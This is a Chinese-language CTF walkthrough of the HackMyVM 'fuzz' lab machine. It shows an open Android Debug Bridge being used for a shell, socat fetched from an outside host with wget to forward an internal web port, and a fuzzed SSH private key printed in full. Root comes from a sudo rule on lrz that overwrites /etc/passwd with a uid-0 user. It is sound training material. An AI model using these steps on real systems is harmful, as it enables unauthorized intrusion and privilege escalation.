hackmyvm靶机-easy-fuzz
一、信息收集
1.获取靶机信息
❯ rustscan -a 192.168.67.4
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
I don't always scan ports, but when I do, I prefer RustScan.
[~] The config file is expected to be at "/Users/xzr1973/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.67.4:22
Open 192.168.67.4:5555
...
...
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
5555/tcp open freeciv syn-ack发现有22和5555两个端口
使用nmap进一步拿到5555端口信息
❯ nmap -sT -sV -Pn -v 192.168.67.4
Starting Nmap 7.97 ( https://nmap.org ) at 2025-08-19 16:09 +0800
...
...
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.9 (protocol 2.0)
5555/tcp open adb Android Debug Bridge (token auth required)
Service Info: OS: Android; CPE: cpe:/o:linux:linux_kernel
(这里发现一开始就能用nmap扫的QAQ)发现端口是安卓的一个调试接口
2.连接adb
# 连接上这个接口
┌──(root㉿kali)-[~]
└─# adb connect 192.168.67.4
connected to 192.168.67.4:5555
# 查看当前连上的设备
┌──(root㉿kali)-[~]
└─# adb devices
List of devices attached
192.168.67.4:5555 device
# 可以看到根目录下没有该用户的执行权限
┌──(root㉿kali)-[~]
└─# adb shell
/ $ ls -al
total 73
drwxr-xr-x 21 primary root 4096 May 19 08:45 .
drwxr-xr-x 21 primary root 4096 May 19 08:45 ..
...
drwxrwxrwt 4 primary root 80 Aug 19 15:47 tmp
drwxr-xr-x 9 primary root 4096 May 19 09:45 usr
drwxr-xr-x 12 primary root 4096 May 19 10:53 var
# 到自己的主目录下
┌──(root㉿kali)-[~]
└─# adb shell
/ $ cd
~ $ ls -al
total 8
drwx------ 2 runner runner 4096 May 19 09:08 .
drwxr-xr-x 4 primary root 4096 May 19 10:02 ..
lrwxrwxrwx 1 primary runner 9 May 19 09:08 .ash_history -> /dev/null
# 看到当前目录使用执行权限的二、用户提权
1.查看外联
┌──(root㉿kali)-[~]
└─# adb shell
/ $ cd
~ $ netstat -anp
netstat: showing only processes with your user ID
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:5555 0.0.0.0:* LISTEN 2388/python3
tcp 0 0 127.0.0.1:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 24 0 192.168.67.4:5555 192.168.67.1:52472 ESTABLISHED 2388/python3
tcp 0 0 192.168.67.4:5555 192.168.67.1:52431 TIME_WAIT -
tcp 0 0 192.168.67.4:5555 192.168.67.1:52457 TIME_WAIT -
tcp 0 0 :::22 :::* LISTEN -
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node PID/Program name Path
unix 2 [ ] DGRAM CONNECTED 15706 -
unix 3 [ ] DGRAM CONNECTED 15654 - /dev/log可以看到有一个80端口没有映射出去
上传一个socat的可执行程序
┌──(root㉿kali)-[~]
└─# adb shell
/ $ cd
~ $ wget xxx.xxx.xxx.xxx/socat
saving to 'socat'
socat 100% |********************************| 347k 0:00:00 ETA
'socat' saved
~ $
┌──(root㉿kali)-[~]
└─# adb shell
/ $ cd
~ $ chmod +x socat
~ $ ./socat TCP-LISTEN:8000,fork TCP4:192.168.67.4:80 &服务打开后可以用nmap扫描确认一下
❯ nmap -p 8000 192.168.67.4
Starting Nmap 7.97 ( https://nmap.org ) at 2025-08-19 16:36 +0800
Nmap scan report for 192.168.67.4
Host is up (0.068s latency).
PORT STATE SERVICE
8000/tcp open http-alt
Nmap done: 1 IP address (1 host up) scanned in 0.65 seconds看到端口已打开就没问题了
爆破出line目录,发现后面有规律
枚举目录,得到应该是到 line5 结束
❯ curl $ip:8080/line
❯ curl $ip:8080/line2
❯ curl $ip:8080/line3
❯ curl $ip:8080/line4
❯ curl $ip:8080/line5
❯ curl $ip:8080/line6
<!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>2.成功连接ssh
继续递归扫描后发现是ssh的私钥,写脚本爆破,最后补全格式
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACArnEFFrjDI6rYt5GmUDxMvSeX3pcn0GGBfgo1EQtXpgwAAAJDS3+5f0t/u
XwAAAAtzc2gtZWQyNTUxOQAAACArnEFFrjDI6rYt5GmUDxMvSeX3pcn0GGBfgo1EQtXpgw
AAAEBCjeRitoZJIm1c4i0VD2Muw5nqgb7zC13vMaxS/la+vSucQUWuMMjqti3kaZQPEy9J
5felyfQYYF+CjURC1emDAAAACWFzYWhpQHBoaQECAwQ=
-----END OPENSSH PRIVATE KEY-----验证私钥,成功连接,拿到user.flag
❯ ssh-keygen -y -f id
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICucQUWuMMjqti3kaZQPEy9J5felyfQYYF+CjURC1emD asahi@phi
❯ ssh -i id asahi@192.168.67.4
fuzzz:~$ cat user.flag
flag{da39a3ee5e6b4b0d3255bfef95601890afd80709}3.sudo提权
sudo -l查看
fuzzz:~$ sudo -l
Matching Defaults entries for asahi on fuzzz:
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
Runas and Command-specific defaults for asahi:
Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"
User asahi may run the following commands on fuzzz:
(ALL) NOPASSWD: /usr/local/bin/lrz这个需要在tabby上运行,不然会卡住,然后上传一个passwd文件加上一个有root权限的新用户
primary:zSZ7Whrr8hgwY:0:0::/root:/bin/sh覆盖原本系统的passwd文件就可以切换用户,拿到root权限
fuzzz:~$ su primary
Password:
/home/asahi # cd
~ # ls
root.flag
~ # cat root.flag
flag{46a0e055d5db8d82eee6e7eb3ee3ccf64be3fca2}三、夺取flag
~ # cat root.flag /home/asahi/user.flag
flag{46a0e055d5db8d82eee6e7eb3ee3ccf64be3fca2}
flag{da39a3ee5e6b4b0d3255bfef95601890afd80709}
License:
CC BY 4.0